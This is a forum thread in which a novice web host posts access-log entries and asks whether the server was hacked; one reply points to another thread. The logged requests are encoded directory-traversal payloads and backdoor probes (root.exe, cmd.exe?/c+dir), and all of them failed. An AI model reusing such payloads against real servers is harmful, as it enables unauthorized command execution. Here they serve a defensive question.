Thread: Was I hacked???

    #1
  1. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Oct 2002
    Posts
    61
    Rep Power
    12

    Was I hacked???


    Hi there,

    I am new too web hosting, thus, I am not good at security.

    However, I might have read it some where from this forum, that the following actions retrived from my log file is a sign of hacking.

    Please analyse:

    61.218.190.227 - - [16/Mar/2003:09:27:47 +1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
    61.218.190.227 - - [16/Mar/2003:09:27:48 +1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
    61.218.190.227 - - [16/Mar/2003:09:27:48 +1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    61.218.190.227 - - [16/Mar/2003:09:27:49 +1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    61.218.190.227 - - [16/Mar/2003:09:27:50 +1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    61.218.190.227 - - [16/Mar/2003:09:27:50 +1100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.218.190.227 - - [16/Mar/2003:09:27:51 +1100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.218.190.227 - - [16/Mar/2003:09:27:51 +1100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
    61.218.190.227 - - [16/Mar/2003:09:27:52 +1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:53 +1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:53 +1100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:54 +1100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:55 +1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
    61.218.190.227 - - [16/Mar/2003:09:27:55 +1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
    61.218.190.227 - - [16/Mar/2003:09:27:56 +1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    61.218.190.227 - - [16/Mar/2003:09:27:56 +1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

    If, it is, any idea how I could prevent it from happening again, and how do I know what has been stolen or viewed?

    Cheers,
  2. #2
  3. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Feb 2003
    Posts
    164
    Rep Power
    12
    Please take a look at this post http://forums.devshed.com/t53884/s.html

    Alot of us have answered the same there
    (its only a few posts down from yours on thsi forum)

    All the best

IMN logo majestic logo threadwatch logo seochat tools logo